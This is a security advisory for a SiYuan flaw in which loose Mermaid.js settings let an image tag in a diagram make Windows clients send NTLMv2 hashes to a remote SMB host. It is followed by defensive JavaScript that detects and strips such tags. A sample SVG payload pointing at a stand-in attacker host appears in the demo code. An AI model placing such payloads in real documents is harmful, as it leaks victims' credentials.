CVE-2026-40107
Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify pass and land in SVG <foreignObject> blocks. The resulting SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the image URL. On Windows, a protocol-relative URL (//attacker.com/image.png) is resolved as a UNC path (\\attacker.com\image.png); Windows then attempts SMB authentication automatically, sending the victim's NTLMv2 hash (the Net-NTLMv2 challenge-response) to the attacker's host. This vulnerability is fixed in 3.6.4.
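The description above covers two controllable points: the Mermaid initialize() settings that let raw HTML through, and the unsanitized innerHTML assignment of the rendered SVG. The following is an added example, not SiYuan's or Mermaid's code, that places the weak configuration beside a hardened one and implements the secondary check a renderer should run over the SVG string before it reaches innerHTML: it finds every <img src> inside a <foreignObject>, classifies the URL the way the victim's platform would resolve it (protocol-relative, UNC, remote scheme, data:image, relative), and strips the ones that would trigger an outbound fetch. The SVG fragment and the host attacker.example are constructed for the demo; the regex-based scan is an illustration of the check, not a substitute for a real sanitizer allow-list.

```javascript
// Added example (not SiYuan/Mermaid code). Weak vs hardened Mermaid settings,
// plus a secondary pass over the rendered SVG before it is assigned to innerHTML.

// Configuration the advisory describes as vulnerable (constructed for illustration).
const WEAK_MERMAID_CONFIG = { securityLevel: "loose", htmlLabels: true };
// Hardened: "strict" keeps Mermaid's sanitizer on; htmlLabels off avoids raw HTML in <foreignObject>.
const HARDENED_MERMAID_CONFIG = { securityLevel: "strict", htmlLabels: false };

// Flag an initialize() config that disables Mermaid's own HTML sanitization.
function mermaidConfigIsWeak(config) {
  return config.securityLevel === "loose" && config.htmlLabels !== false;
}

// Classify a src value by how the client would resolve it. On Windows a
// protocol-relative "//host/path" becomes the UNC path "\\host\path", which
// triggers an SMB connection and an automatic NTLM authentication attempt.
function classifyImgSrc(src) {
  const s = src.trim();
  if (/^\/\/[^/\\]/.test(s)) return "protocol-relative"; // //attacker.example/image.png
  if (/^\\\\/.test(s)) return "unc";                     // \\attacker.example\image.png
  if (/^[a-z][a-z0-9+.-]*:/i.test(s)) {
    return /^data:image\//i.test(s) ? "data-image" : "remote"; // http:, https:, file:, ...
  }
  return "relative";
}

const SRC_ATTR = /\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;

// List every <img src> found inside <foreignObject> blocks of an SVG string.
function findForeignObjectImgs(svg) {
  const results = [];
  const fo = /<foreignObject[\s\S]*?<\/foreignObject>/gi;
  let block;
  while ((block = fo.exec(svg)) !== null) {
    const imgTag = /<img\b[^>]*>/gi;
    let tag;
    while ((tag = imgTag.exec(block[0])) !== null) {
      const m = SRC_ATTR.exec(tag[0]);
      const src = m ? (m[1] ?? m[2] ?? m[3] ?? "") : "";
      results.push({ src, kind: classifyImgSrc(src) });
    }
  }
  return results;
}

// Secondary sanitization before innerHTML: drop any <img> whose src would
// cause an outbound request. Relative paths and data:image/ URIs are kept.
function neutralizeImgs(svg) {
  const blocked = new Set(["protocol-relative", "unc", "remote"]);
  return svg.replace(/<img\b[^>]*>/gi, (tag) => {
    const m = SRC_ATTR.exec(tag);
    const src = m ? (m[1] ?? m[2] ?? m[3] ?? "") : "";
    return blocked.has(classifyImgSrc(src)) ? "" : tag;
  });
}

// Constructed sample: what a loose-mode render of a malicious label could look like.
const SAMPLE_SVG = [
  '<svg xmlns="http://www.w3.org/2000/svg"><g class="node">',
  '<foreignObject width="120" height="40"><div xmlns="http://www.w3.org/1999/xhtml">',
  'Label <img src="//attacker.example/image.png" alt="x">',
  '<img src="data:image/png;base64,iVBORw0KGgo=">',
  '<img src="assets/ok.png">',
  "</div></foreignObject></g></svg>",
].join("");

// Usage: scan, then assign the neutralized SVG instead of the raw one.
// container.innerHTML = neutralizeImgs(rawSvgFromMermaid);
console.log(mermaidConfigIsWeak(WEAK_MERMAID_CONFIG), mermaidConfigIsWeak(HARDENED_MERMAID_CONFIG));
console.log(findForeignObjectImgs(SAMPLE_SVG));
console.log(neutralizeImgs(SAMPLE_SVG));
```

The scan is defense in depth for the innerHTML sink; the primary fix is the configuration change (or the upgrade to 3.6.4 the advisory names). Because the SMB leak happens at the OS level once a UNC path is touched, blocking outbound TCP 445 at the perimeter also limits the impact of any remaining UNC-triggering vector.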
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| github.com/siyuan-note/siyuan/kernel (Go) | < 0.0.0-20260407035653-2f416e5253f1 | 0.0.0-20260407035653-2f416e5253f1 |
Affected products
- Range: < 0.0.0-20260407035653-2f416e5253f1
Patches
No patches discovered yet.
References
- github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455 (NVD: Exploit, Vendor Advisory)
- github.com/advisories/GHSA-w95v-4h65-j455 (GHSA: Advisory)
- nvd.nist.gov/vuln/detail/CVE-2026-40107 (GHSA: Advisory)